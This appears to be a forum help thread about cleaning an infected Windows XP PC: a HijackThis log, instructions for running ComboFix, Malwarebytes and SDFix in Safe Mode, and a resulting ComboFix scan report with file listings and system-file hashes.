For the third time this year, the folks have managed, as if by a miracle, to fill the machine with all kinds of malicious stuff. But without further ado, here is my HJT log, if you'd care to take a look:

-------------

Logfile of HijackThis v1.99.1
Scan saved at 17:25:06, on 26.8.2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Sygate\smc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\Avast4\aswUpdSv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Microsoft IntelliPoint\point32.exe
C:\Program Files\Microsoft IntelliType Pro\type32.exe
C:\WINDOWS\system32\rundll32.exe
D:\BlueTooth\bin\btwdins.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Canon\CAL\CALMAIN.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Mozilla Firefox\firefox.exe
C:\HiJackThis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Linkit
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Ohjelmat\java\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Liven kirjautumisapuohjelma - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [IntelliPoint] "C:\Program Files\Microsoft IntelliPoint\point32.exe"
O4 - HKLM\..\Run: [type32] "C:\Program Files\Microsoft IntelliType Pro\type32.exe"
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\smc.exe -startgui
O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
O4 - HKLM\..\Run: [nar] C:\WINDOWS\nar.vbs
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Lähetä &Bluetooth-laitteeseen - D:\BlueTooth\btsendto_ie_ctx.htm
O8 - Extra context menu item: Open Link Target in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewlink.html
O8 - Extra context menu item: View This Page in Firefox - file://C:\Documents and Settings\Omistaja\Application Data\Mozilla\Firefox\Profiles\wjofrm9v.default\extensions\{5D558C43-550F-4b12-84AB-0D8ABDA9F975}\firefoxviewpage.html
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Ohjelmat\java\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-4017 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - D:\BlueTooth\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [INTERNATIONAL] International*
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab
O16 - DPF: {3B36B017-7E49-426B-95B0-B5CECD83C2E2} (IfolorUploader Control) - http://fika-web.ifolor.net/OrderingGeneral/LowRes/app_support/ActiveX/IfolorUploader_fika.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/msnmessengersetupdownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab32846.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O16 - DPF: {F6BF0D00-0B2A-4A75-BF7B-F385591623AF} (Solitaire Showdown Class) - http://messenger.zone.msn.com/binary/SolitaireShowdown.cab31267.cab
O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL
O18 - Protocol: widimg - {EE7C2AFF-5742-44FF-BD0E-E521B0D3C3BA} - C:\WINDOWS\system32\btxppanel.dll
O20 - Winlogon Notify: dimsntfy - %SystemRoot%\System32\dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Avast4\aswUpdSv.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Avast4\ashMaiSv.exe" /service (file missing)
O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Avast4\ashWebSv.exe" /service (file missing)
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation - D:\BlueTooth\bin\btwdins.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\smc.exe
1. Download combofix.exe to your desktop from one of these links: combofix1 combofix2
2. Double-click combofix.exe and follow the prompts.
3. When the tool is done, it produces a log. Post that log in your thread.

Note! Do not click inside the ComboFix window while it is running. That may cause the program to hang.

===========

Download Malwarebytes' Anti-Malware to your desktop.

1. Double-click mbam-setup.exe and follow the prompts to install the program.
2. At the end, make sure the following are checked: Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
3. If an update is found, the program will download and install the latest version.
4. Once the program has loaded, select Perform full scan and click Scan.
5. When the scan is complete, click OK and then Show Results to view the results.
6. Make sure everything is checked and click Remove Selected.
7. After that, a log will open in Notepad. Save it somewhere you can find it easily. The log can also be found here: C:\Documents and Settings\Username\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs\log-date.txt
8. Post the contents of the log in your next reply.

============

Download SDFix by AndyManchesta and save it to your desktop.

Boot your computer into Safe Mode:
- shut down and restart
- while it starts, tap the F8 key
- use the arrow keys to select Safe Mode
- press Enter, then Enter again
- select your user account
- press Yes
On some machines you tap F5 instead of F8.

- Once in Safe Mode, extract the contents of SDFix.zip (the SDFix folder) to your desktop. A folder named SDFix should appear on the desktop.
- Open the SDFix folder and double-click RunThis.bat to start the tool.
- Press Y to start the script.
- The tool cleans out the trojan's services and also makes some repairs to the registry. Finally it asks you to restart the computer, "Press any key to Reboot".
- Press any key and the computer will restart.
- Startup takes longer than usual because SDFix is cleaning the machine.
- When the computer has started and the desktop has loaded, SDFix reports that the cleanup is done, "Finished".
- Then press any key to close the script and load the desktop icons.
- Finally, open the SDFix folder (on the desktop) and copy & paste the contents of Report.txt into your thread, together with a fresh HijackThis log.
ComboFix 08-08-27.05 - Omistaja 2008-08-28 13:42:27.4 - NTFSx86
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1035.18.230 [GMT 3:00]
Running from: C:\Documents and Settings\Omistaja\Työpöytä\ComboFix.exe
 * Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
(((((((((((((((((((((((((((((((((((((( Other deletions ))))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com\clearspring.sol
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\#SharedObjects\82QU3YES\bin.clearspring.com\ws\wan\wanLib.swf\481f8cb267605bfc.sol
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com
C:\Documents and Settings\Omistaja\Application Data\macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#bin.clearspring.com\settings.sol
.
((((( Files created between 2008-07-28 and 2008-08-28 )))))))))))))))))
.
2008-08-28 13:10 . 2008-08-28 13:19 <DIR> d-------- C:\WINDOWS\LastGood
2008-08-14 19:47 . 2008-05-01 17:35 331,776 -----c--- C:\WINDOWS\system32\dllcache\msadce.dll
2008-08-14 19:44 . 2008-04-11 22:05 691,712 -----c--- C:\WINDOWS\system32\dllcache\inetcomm.dll
.
(((((((((((((((((((((((((((((((((((( Find3M report ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-08-28 10:21 --------- d-----w C:\Program Files\Mozilla Thunderbird
2008-08-26 13:00 --------- d-----w C:\Documents and Settings\Omistaja\Application Data\uTorrent
2008-08-20 16:49 17,920 ----a-w C:\Documents and Settings\Omistaja\Application Data\GDIPFONTCACHEV1.DAT
2008-07-18 19:10 94,920 ----a-w C:\WINDOWS\system32\cdm.dll
2008-07-18 19:10 53,448 ----a-w C:\WINDOWS\system32\wuauclt.exe
2008-07-18 19:09 563,912 ----a-w C:\WINDOWS\system32\wuapi.dll
2008-07-18 19:09 325,832 ----a-w C:\WINDOWS\system32\wucltui.dll
2008-07-18 19:09 205,000 ----a-w C:\WINDOWS\system32\wuweb.dll
2008-07-18 19:09 1,811,656 ----a-w C:\WINDOWS\system32\wuaueng.dll
2008-07-07 20:28 253,952 ----a-w C:\WINDOWS\system32\es.dll
2008-07-07 13:53 --------- d-----w C:\Program Files\Ahead
2008-06-24 16:44 74,240 ----a-w C:\WINDOWS\system32\SETBC.tmp
2008-06-24 07:29 3,592,192 ----a-w C:\WINDOWS\system32\SET10.tmp
2008-06-23 16:29 826,368 ----a-w C:\WINDOWS\system32\SET7.tmp
2008-06-23 16:29 63,488 ----a-w C:\WINDOWS\system32\SET1F.tmp
2008-06-23 16:29 6,066,176 ----a-w C:\WINDOWS\system32\SET18.tmp
2008-06-23 16:29 52,224 ----a-w C:\WINDOWS\system32\SET11.tmp
2008-06-23 16:29 459,264 ----a-w C:\WINDOWS\system32\SET12.tmp
2008-06-23 16:29 383,488 ----a-w C:\WINDOWS\system32\SET1A.tmp
2008-06-23 16:29 267,776 ----a-w C:\WINDOWS\system32\SET16.tmp
2008-06-23 16:29 233,472 ----a-w C:\WINDOWS\system32\SET8.tmp
2008-06-23 16:29 124,928 ----a-w C:\WINDOWS\system32\SET22.tmp
2008-06-23 16:29 105,984 ----a-w C:\WINDOWS\system32\SETA.tmp
2008-06-23 16:29 1,159,680 ----a-w C:\WINDOWS\system32\SET9.tmp
2008-06-20 17:47 246,784 ----a-w C:\WINDOWS\system32\mswsock.dll
2007-07-19 16:07 5,632 --sha-w C:\Program Files\Thumbs.db
2006-04-03 13:14 0 -c-ha-w C:\Documents and Settings\Omistaja\hpothb07.dat
2004-10-01 13:00 40,960 ----a-w C:\Program Files\Uninstall_CDS.exe
2008-05-19 19:18 7,474 --sha-r C:\WINDOWS\Nar.vbs
.
------- Sigcheck -------
2004-09-15 15:00 14336 34c8d42b876703b3abf0562307428561 C:\WINDOWS\$NtServicePackUninstall$\svchost.exe
2008-04-14 19:12 14336 6138d30346cf435d2bf32cbc1437f625 C:\WINDOWS\ServicePackFiles\i386\svchost.exe
2008-04-14 19:12 14336 6138d30346cf435d2bf32cbc1437f625 C:\WINDOWS\system32\svchost.exe
2005-03-02 21:20 577536 409647243875a2f91bae81cbef248cb6 C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\user32.dll
2007-03-08 18:50 578560 90f1d04938bae133e2f4d8f7f0fa4fa0 C:\WINDOWS\$hf_mig$\KB925902\SP2QFE\user32.dll
2007-03-08 18:38 578048 c198eac972598be7e61364f7db3b663d C:\WINDOWS\$NtServicePackUninstall$\user32.dll
2004-09-15 15:00 577536 44c02bc54d56ed3a685302e91396720a C:\WINDOWS\$NtUninstallKB890859$\user32.dll
2005-03-02 21:18 577536 aeefa9d983c986e7a8d6d80ca165b93f C:\WINDOWS\$NtUninstallKB925902$\user32.dll
2008-04-14 19:11 579072 9d0a78e87972b880c254241262108232 C:\WINDOWS\ServicePackFiles\i386\user32.dll
2008-04-14 19:11 579072 9d0a78e87972b880c254241262108232 C:\WINDOWS\system32\user32.dll
2004-09-15 15:00 82944 911c48bb2df21e2088c23260dd112e80 C:\WINDOWS\$NtServicePackUninstall$\ws2_32.dll
2008-04-14 19:11 82432 17f2addc53069471ea68528e5458ff2e C:\WINDOWS\ServicePackFiles\i386\ws2_32.dll
2008-04-14 19:11 82432 17f2addc53069471ea68528e5458ff2e C:\WINDOWS\system32\ws2_32.dll
2005-01-27 20:12 657920 9f621aa8e09012a4566480eda61c368c C:\WINDOWS\$hf_mig$\KB867282\SP2QFE\wininet.dll
2005-05-02 23:58 658944 75eea34c4afd5a983f5e6b660e5f1da2 C:\WINDOWS\$hf_mig$\KB883939\SP2QFE\wininet.dll
2005-09-03 03:08 660480 2983c9ae18e389c328a349f572f1aaad C:\WINDOWS\$hf_mig$\KB896688\SP2QFE\wininet.dll
2005-07-03 05:11 659456 042e7a572b55af4b7d11a6a8a5179f8c C:\WINDOWS\$hf_mig$\KB896727\SP2QFE\wininet.dll
2005-10-21 06:39 661504 27c407d0527b18201f1f2927d39b246f C:\WINDOWS\$hf_mig$\KB905915\SP2QFE\wininet.dll
2006-03-04 06:58 663552 0b5f9971aa3522edeca79fd34619652f C:\WINDOWS\$hf_mig$\KB912812\SP2QFE\wininet.dll
2006-05-10 08:27 663552 c4e5a8f0cdeb3ae634ec96b5c5a5715e C:\WINDOWS\$hf_mig$\KB916281\SP2QFE\wininet.dll
2006-06-23 14:25 664576 ed19f0e21afc6ad5f7b206be851f662b C:\WINDOWS\$hf_mig$\KB918899\SP2QFE\wininet.dll
2006-09-14 11:37 664576 f24d8577ec89d6ad405ea85eb51285d7 C:\WINDOWS\$hf_mig$\KB922760\SP2QFE\wininet.dll
2007-03-23 12:29 823296 462f189562635461bd5f6917a0bbb3fc C:\WINDOWS\$hf_mig$\KB931768-IE7\SP2QFE\wininet.dll
2007-04-25 11:29 823808 c44d048452288b8e3d0d0c6668fec649 C:\WINDOWS\$hf_mig$\KB933566-IE7\SP2QFE\wininet.dll
2007-06-27 17:15 824320 2733e526118d99b6e034d8c4edd4d11e C:\WINDOWS\$hf_mig$\KB937143-IE7\SP2QFE\wininet.dll
2007-08-20 12:50 825344 576cda8ff35c88b4e53acc9247bb4ba6 C:\WINDOWS\$hf_mig$\KB939653-IE7\SP2QFE\wininet.dll
2007-10-11 02:23 825344 97448c39d6185a4514dda6c6a861a4e6 C:\WINDOWS\$hf_mig$\KB942615-IE7\SP2QFE\wininet.dll
2007-12-07 04:42 825344 4551eb7ab420af3db7eabd5a83c8100c C:\WINDOWS\$hf_mig$\KB944533-IE7\SP2QFE\wininet.dll
2008-03-01 15:35 827392 62b193606f56d6ceab6704af6a45774f C:\WINDOWS\$hf_mig$\KB947864-IE7\SP2QFE\wininet.dll
2008-04-23 07:21 827392 e56922cde1cb53087289c41cdabde9f9 C:\WINDOWS\$hf_mig$\KB950759-IE7\SP2QFE\wininet.dll
2008-06-23 18:40 827904 30b60fb6a1051e80a1054df25a4f9913 C:\WINDOWS\$hf_mig$\KB953838-IE7\SP2QFE\wininet.dll
2004-09-15 15:00 656384 24965d454199a92ee14f2f0e4374f89c C:\WINDOWS\$NtUninstallKB867282$\wininet.dll
2005-01-27 20:14 656896 ed5b97fbe98564a15ab191d21ab90bc4 C:\WINDOWS\$NtUninstallKB883939$\wininet.dll
2005-07-03 05:16 658432 062416aff780180023f2d6d0766551ef C:\WINDOWS\$NtUninstallKB896688$\wininet.dll
2005-05-02 23:56 657920 5689f1dd804b5ef9e2d843a17bbe8265 C:\WINDOWS\$NtUninstallKB896727$\wininet.dll
2005-09-03 03:05 658432 6d5f933f96eaeaf04e0824cb4c0dfa5d C:\WINDOWS\$NtUninstallKB905915$\wininet.dll
2005-10-21 06:41 658432 789ff5e1455d68cfb33278d8436045ac C:\WINDOWS\$NtUninstallKB912812$\wininet.dll
2006-03-04 06:35 658432 acba6baade5b46fb304a86d9fe718c7c C:\WINDOWS\$NtUninstallKB916281$\wininet.dll
2006-05-10 08:23 658432 881a657e894cd545b5de8f1ad645247c C:\WINDOWS\$NtUninstallKB918899$\wininet.dll
2006-06-23 14:11 658944 422270af6d8461851d20c843a64fba47 C:\WINDOWS\$NtUninstallKB922760$\wininet.dll
2006-09-14 11:39 658944 ece807a59d73b089a3be56fd78c9a7d3 C:\WINDOWS\ie7\wininet.dll
2006-11-07 22:03 818688 92995334f993e6e49c25c6d02ec04401 C:\WINDOWS\ie7updates\KB928090-IE7\wininet.dll
2007-01-12 10:27 822784 be43d00d802c92f01c8cc952c6f483f8 C:\WINDOWS\ie7updates\KB931768-IE7\wininet.dll
2007-02-27 16:32 822784 a316582e09c465750ed9061307004e50 C:\WINDOWS\ie7updates\KB933566-IE7\wininet.dll
2007-04-25 10:40 822784 d75ec9b36ec9d617906859341be701df C:\WINDOWS\ie7updates\KB937143-IE7\wininet.dll
2007-06-27 17:06 823808 d0435e210cb71a930a5491bc14714d81 C:\WINDOWS\ie7updates\KB939653-IE7\wininet.dll
2007-08-20 12:59 824832 5a88886d5958af9309b517897d02260c C:\WINDOWS\ie7updates\KB942615-IE7\wininet.dll
2007-10-11 02:52 824832 658bdbc46e45cd4cd7cd7896b6cf4e88 C:\WINDOWS\ie7updates\KB944533-IE7\wininet.dll
2007-12-07 05:14 824832 d0d4908912f67aad4cc6e8b0b1df39c9 C:\WINDOWS\ie7updates\KB947864-IE7\wininet.dll
2008-03-01 16:01 826368 a593abdc028e8ef0137ea953f84704b1 C:\WINDOWS\ie7updates\KB950759-IE7\wininet.dll
2008-04-23 07:16 826368 77f1c09d0cfc01d1b5740a999374fa33 C:\WINDOWS\ie7updates\KB953838-IE7\wininet.dll
2008-04-14 19:11 666112 805df36832d972480e4ec8adc5a85c9b C:\WINDOWS\ServicePackFiles\i386\wininet.dll
2008-06-23 19:29 826368 d8d46a9b69c6aedb8bb3b9b59ef56b23 C:\WINDOWS\SoftwareDistribution\Download\f4af3a1e346641861d114a1df25c12d2\SP2GDR\wininet.dll
2008-06-23 18:40 827904 30b60fb6a1051e80a1054df25a4f9913 C:\WINDOWS\SoftwareDistribution\Download\f4af3a1e346641861d114a1df25c12d2\SP2QFE\wininet.dll
2008-04-23 07:16 826368 77f1c09d0cfc01d1b5740a999374fa33 C:\WINDOWS\system32\wininet.dll
2008-06-23 19:29 826368 d8d46a9b69c6aedb8bb3b9b59ef56b23 C:\WINDOWS\system32\dllcache\wininet.dll
2005-05-25 22:07 359936 63fdfea54eb53de2d863ee454937ce1e C:\WINDOWS\$hf_mig$\KB893066\SP2QFE\tcpip.sys
2006-01-13 20:07 360448 5562cc0a47b2aef06d3417b733f3c195 C:\WINDOWS\$hf_mig$\KB913446\SP2QFE\tcpip.sys
2006-04-20 15:18 360576 b2220c618b42a2212a59d91ebd6fc4b4 C:\WINDOWS\$hf_mig$\KB917953\SP2QFE\tcpip.sys
2007-10-30 19:53 360832 64798ecfa43d78c7178375fcdd16d8c8 C:\WINDOWS\$hf_mig$\KB941644\SP2QFE\tcpip.sys
2008-06-20 14:59 361600 ad978a1b783b5719720cff204b666c8e C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\tcpip.sys
2007-10-30 20:20 360064 90caff4b094573449a0872a0f919b178 C:\WINDOWS\$NtServicePackUninstall$\tcpip.sys
2004-09-15 15:00 359040 9f4b36614a0fc234525ba224957de55c C:\WINDOWS\$NtUninstallKB893066$\tcpip.sys
2005-05-25 22:04 359808 88763a98a4c26c409741b4aa162720c9 C:\WINDOWS\$NtUninstallKB913446$\tcpip.sys
2006-01-13 05:28 359808 583e063fdc888ca30d05c2724b0d7ef4 C:\WINDOWS\$NtUninstallKB917953$\tcpip.sys
2006-04-20 14:51 359808 1dbf125862891817f374f407626967f4 C:\WINDOWS\$NtUninstallKB941644$\tcpip.sys
2008-04-13 22:20 361344 93ea8d04ec73a85db02eb8805988f733 C:\WINDOWS\$NtUninstallKB951748$\tcpip.sys
2008-04-13 22:20 361344 93ea8d04ec73a85db02eb8805988f733 C:\WINDOWS\ServicePackFiles\i386\tcpip.sys
2008-06-20 14:51 361600 9aefa14bd6b182d61e3119fa5f436d3d C:\WINDOWS\system32\dllcache\tcpip.sys
2008-06-20 14:51 361600 9aefa14bd6b182d61e3119fa5f436d3d C:\WINDOWS\system32\drivers\tcpip.sys
2004-09-15 15:00 502784 5f0714b1447dc0262789c3cc43752418 C:\WINDOWS\$NtServicePackUninstall$\winlogon.exe
2008-04-14 19:12 508416 76b238743be82d4cae1b7c95c898b6b6 C:\WINDOWS\ServicePackFiles\i386\winlogon.exe
2008-04-14 19:12 508416 76b238743be82d4cae1b7c95c898b6b6 C:\WINDOWS\system32\winlogon.exe
2004-09-15 15:00 182912 558635d3af1c7546d26067d5d9b6959e C:\WINDOWS\$NtServicePackUninstall$\ndis.sys
2008-04-13 22:20 182656 1df7f42665c94b825322fae71721130d C:\WINDOWS\ServicePackFiles\i386\ndis.sys
2008-04-13 22:20 182656 1df7f42665c94b825322fae71721130d C:\WINDOWS\system32\drivers\ndis.sys
2004-09-15 15:00 29056 4448006b6bc60e6c027932cfc38d6855 C:\WINDOWS\$NtServicePackUninstall$\ip6fw.sys
2008-04-13 21:53 36608 3bb22519a194418d5fec05d800a19ad0 C:\WINDOWS\ServicePackFiles\i386\ip6fw.sys
2008-04-13 21:53 36608 3bb22519a194418d5fec05d800a19ad0 C:\WINDOWS\system32\drivers\ip6fw.sys
2005-03-02 21:13 2059264 01f49730c2d76aad87c4d2b2dd4e12e2 C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\ntkrnlpa.exe
2006-12-19 21:45 2061696 8f3bbe9045dfe4d89b24552fcba0e8b2 C:\WINDOWS\$hf_mig$\KB929338\SP2QFE\ntkrnlpa.exe
2007-02-28 19:08 2061696 8bacc2a67078823acab7c8306f394918 C:\WINDOWS\$hf_mig$\KB931784\SP2QFE\ntkrnlpa.exe
2007-02-28 19:02 2059904 9f7bc4398e9a43f533ed4d8e690b1cd6 C:\WINDOWS\$NtServicePackUninstall$\ntkrnlpa.exe
2004-09-15 15:00 2059136 e6cbe47b5ea01ce981e4663900f04a15 C:\WINDOWS\$NtUninstallKB890859$\ntkrnlpa.exe
2005-03-02 21:08 2059136 1c09a92e5a1c21ca1ad367f13f9b5a9d C:\WINDOWS\$NtUninstallKB929338$\ntkrnlpa.exe
2006-12-19 21:22 2059904 09e0237ef89c06c44b8433733060573f C:\WINDOWS\$NtUninstallKB931784$\ntkrnlpa.exe
2008-04-14 18:49 2068224 fb43994013605429b57f7b1040f7c525 C:\WINDOWS\ServicePackFiles\i386\ntkrnlpa.exe
2008-04-14 18:49 2068224 fb43994013605429b57f7b1040f7c525 C:\WINDOWS\system32\ntkrnlpa.exe
2005-03-02 21:13 2181888 6e55b15ee58a0eaaaf20db1f4da39add C:\WINDOWS\$hf_mig$\KB890859\SP2QFE\ntoskrnl.exe
2006-12-19 21:45 2184320 8f8898bc0cb9fd8c6b0a575367a977bd C:\WINDOWS\$hf_mig$\KB929338\SP2QFE\ntoskrnl.exe
2007-02-28 19:08 2184448 7ff07a634379ee2fd2b097fd76c49bfc C:\WINDOWS\$hf_mig$\KB931784\SP2QFE\ntoskrnl.exe
2007-02-28 19:02 2182656 6a51f190523074b729702923fac865f4 C:\WINDOWS\$NtServicePackUninstall$\ntoskrnl.exe
2004-09-15 15:00 2183296 2a8e38e78177bf83c73897511a4eecd0 C:\WINDOWS\$NtUninstallKB890859$\ntoskrnl.exe
2005-03-02 21:08 2181632 ae8d156d1028fba3939609f4c39eb1f1 C:\WINDOWS\$NtUninstallKB929338$\ntoskrnl.exe
2006-12-19 21:22 2182656 22a830ae087de7e3d72c4b1d9611bf6e C:\WINDOWS\$NtUninstallKB931784$\ntoskrnl.exe
2008-04-14 18:49 2191360 cb0343f73a320cd0fefebeefd946fc97 C:\WINDOWS\ServicePackFiles\i386\ntoskrnl.exe
2008-04-14 18:49 2191360 cb0343f73a320cd0fefebeefd946fc97 C:\WINDOWS\system32\ntoskrnl.exe
2008-04-14 19:12 1034240 0c35f47295002f8a06419744e945d670 C:\WINDOWS\explorer.exe
2007-06-13 16:10 1033728 fb53c3b1e17f62e8fcb07caaf4c4272e C:\WINDOWS\$hf_mig$\KB938828\SP2QFE\explorer.exe
2007-06-13 16:22 1033728 0f88a5b1ca666754c4c62ad3db4730ef C:\WINDOWS\$NtServicePackUninstall$\explorer.exe
2004-09-15 15:00 1032704 43c0b3d357f319875a51bc111f393147 C:\WINDOWS\$NtUninstallKB938828$\explorer.exe
2008-04-14 19:12 1034240 0c35f47295002f8a06419744e945d670 C:\WINDOWS\ServicePackFiles\i386\explorer.exe
2004-09-15 15:00 108544 c2f8f8343435fc080c2de25a410e09e8 C:\WINDOWS\$NtServicePackUninstall$\services.exe
2008-04-14 19:12 109056 e473263067492fc77f7690d4112caf16 C:\WINDOWS\ServicePackFiles\i386\services.exe
2008-04-14 19:12 109056 e473263067492fc77f7690d4112caf16 C:\WINDOWS\system32\services.exe
2004-09-15 15:00 13312 39726087f99c7775b2ea1f2990709817 C:\WINDOWS\$NtServicePackUninstall$\lsass.exe
2008-04-14 19:12 13312 abe0d5760dafd55390057378cda68bd8 C:\WINDOWS\ServicePackFiles\i386\lsass.exe
2008-04-14 19:12 13312 abe0d5760dafd55390057378cda68bd8 C:\WINDOWS\system32\lsass.exe
2004-09-15 15:00 15360 e8e7ce0d379630e7b0015e48fa90499b C:\WINDOWS\$NtServicePackUninstall$\ctfmon.exe
2008-04-14 19:12 15360 b067064d68be516f1b5417a086f0bfe9 C:\WINDOWS\ServicePackFiles\i386\ctfmon.exe
2008-04-14 19:12 15360 b067064d68be516f1b5417a086f0bfe9 C:\WINDOWS\system32\ctfmon.exe
2005-06-11 03:17 57856 ad3d9d191aea7b5445fe1d82ffbb4788 C:\WINDOWS\$hf_mig$\KB896423\SP2QFE\spoolsv.exe
2005-06-11 02:53 57856 da81ec57acd4cdc3d4c51cf3d409af9f C:\WINDOWS\$NtServicePackUninstall$\spoolsv.exe
